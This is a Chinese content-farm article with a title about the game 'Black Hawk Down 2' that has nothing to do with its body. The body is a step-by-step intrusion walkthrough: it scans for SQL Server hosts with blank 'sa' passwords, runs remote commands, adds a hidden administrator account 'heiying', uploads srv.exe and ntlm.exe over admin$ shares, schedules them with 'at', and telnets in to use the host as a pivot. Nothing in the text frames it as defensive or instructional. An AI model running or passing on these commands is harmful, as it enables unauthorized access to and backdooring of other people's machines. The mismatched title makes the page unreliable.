大家好,小福来为大家解答以上的问题。黑鹰坠落2现代战争，heiying这个很多人还不知道,现在让我们一起来看看吧！

1、做木马，留后门，他的ip肯定是动态ip，就算是固定的，现在计算机安装的都有杀毒和防火墙，不好进使用的工具:流光IV 启动流光，按Ctrl+R。

2、出现扫描设置对话框，设置扫描IP段，并且选择扫描的类型为SQL。

3、点击“确定”，进行扫描，假设我们取得主机：127.0.0.1，然后点击“工具” —— SQL远程命令（或者Ctrl+Q），填入主机IP（127.0.0.1）、用户（sa）、密码（空）点击“连接”，出现远程命令行的界面。

4、 net user heiying heiying1 /add 填加一个heiying的帐号和密码heiying1 net localgroup administrators heiying /add 将我们创建的heiying帐号填加到管理组。

5、 下面我们来做跳板： 打开cmd.exe,输入net use \127.0.0.1ipc$ "heiying1" /user:"heiying"命令 显示命令成功完成。

6、 上传srv.exe： copy srv.exe \127.0.0.1admin$system32 上传ntlm.exe： copy ntlm.exe \127.0.0.1admin$system32 启动服务： 首先用net time \127.0.0.1 看看对方主机的时间,(假如回显\127.0.0.1 的本地时间是上午12.00)，然后我们用at \2127.0.0.1 12.01 srv.exe命令来启动srv.exe。

7、等一分钟后就可以telnet了。

8、 一分钟后在本机命令提示符中输入： telnet X.X.X.X 99 然后我们要启动NTLM.exe： 在telnet状态下直接输入ntlm回车。

9、 显示：windows 2000 telnet dump,by assassin,all rights reserved.done! 然后从新启动对方主机的telnet服务：net stop telnet（先关闭telnet服务）再输入net start telnet（启动telnet服务）然后我们退出telnet，然后在命令行下输入telnet 127.0.0.1,依照提示,接着输入用户名：heiying,密码：heiying1，回车。

10、这样,我们的跳板就做好了，简单吧？ （上面上传的srv和ntlm等东东还有一个简便方法，全都可以直接用流光工具菜单里的种植者上传，60秒后自动运行，不用敲命令！呵呵~~~~方便吧！）。

本文到此分享完毕，希望对大家有所帮助。

版权说明： 本文版权归原作者所有，转载文章仅为传播更多信息之目的，如作者信息标记有误，请第一时间联系我们修改或删除，多谢。

标签：